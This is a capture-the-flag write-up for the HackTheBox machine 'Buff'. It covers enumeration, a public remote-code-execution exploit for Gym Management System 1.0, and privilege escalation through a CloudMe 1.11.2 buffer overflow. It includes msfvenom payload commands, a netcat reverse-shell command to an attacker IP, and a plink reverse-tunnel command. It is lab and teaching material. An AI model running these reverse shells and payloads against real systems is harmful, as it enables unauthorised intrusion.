HTB BUFF Writeup

Buff is rated as an “Easy” Window machine on HackTheBox .Related to CVEs. Webshells, file transfers, and SSH tunnel port forwarding.

Enumeration

nmap -sC -sV 10.10.10.198

There is only 1 port 8080 is open which is associated with http . We can see a website hosted there with a login page on index.php.

Firstly i thought of trying random credentials there on the login page but i checked source code and other tabs there on the screen like Package, Facilities, etc.
Then I saw something unusual on Contact.php

Made using Gym Management Software 1.0

I quickly searched any known exploit for this and fall upon this.
Gym Management System 1.0 – Unauthenticated Remote Code Execution

After running the exploit we are presented by user shell.
Here, i checked for some services are available on the machine.
wget, curl, openssh, scp, nc, ncat, ftp.

By using curl we can upload files here from our machine. So I downloaded netcat executable and transferred it here to get reverse Powershell.
(make sure executable is 64bit because OS architecture on buff is 64bit. )

So, we got the Powershell here.

Privilege Escalation

I was finding services to escalate privileges by running winPEAS and Powerup but couldn’t find anything.
While i was going through directories I saw a file called CloudMe_1112.exe
I started gathering information about it and came across a known exploit of the exact same version.
CloudMe 1.11.2 – Buffer Overflow (PoC)
If you see the line above the payload value you can see the command how the payload is generated. But we have to edit the Payload like this

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.108 LPORT=4444 -b '\x00\x0a\x0d' -f csharp

But the problem here is that the machine doesn’t have python or python3 installed in it. So I have to figure out something else to run our exploit as mentioned above.
We can compile C# in windows to make an executable.
Converted C# exploit:

Replace the “PAYLOAD HERE” value with your payload which was generated from msfvenom.
Then transfer the exploit to the machine.

Compile the exploit on the machine.
PS C:\xampp\htdocs\gym\upload> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe exploit.cs

The output would be an exploit.exe
Now, the final steps are
1. Open another reverse shell to run CloudMe_1112.exe
2. Open msfconsole and fire up a listener.

3. Run CloudMe_1112.exe in 1 shell and our exploit.exe on another shell.

Finally we got the root shell.

Alternative

We can use plink.exe to set up a tunnel which we can use as a gateway for Reverse_TCP Sessions and then run our Exploit python script there to get a reverse shell.

  • Download and transfer Plink.exe (obviously 64bit) to the machine.
  • Change your default ssh port by changing Port 22 to any unused port in etc/ssh/sshd_config file(In my case it is 4321).
  • Generate payload for our exploit.
  • msfvenom -p windows/exec CMD='c:\xampp\htdocs\gym\upload\nc.exe -e powershell.exe 10.10.14.108 5555' -b '\x00\x0a\x0d' -f py -v payload
  • Copy and paste this to our exploit.
  • Open another terminal and fire up an nc listener on port 5555.
  • Go to the machine and run plink.exe with the following input
  • plink.exe -l geek -pw mypassword -P 4321 10.10.14.2 -R 8888:127.0.0.1:8888
    -l : Username
    -pw: Password
    -P: Port
    -R: Tunneling

Here we got our user shell run the exploit here as shown above.

We got the root shell again !!

Leave a Reply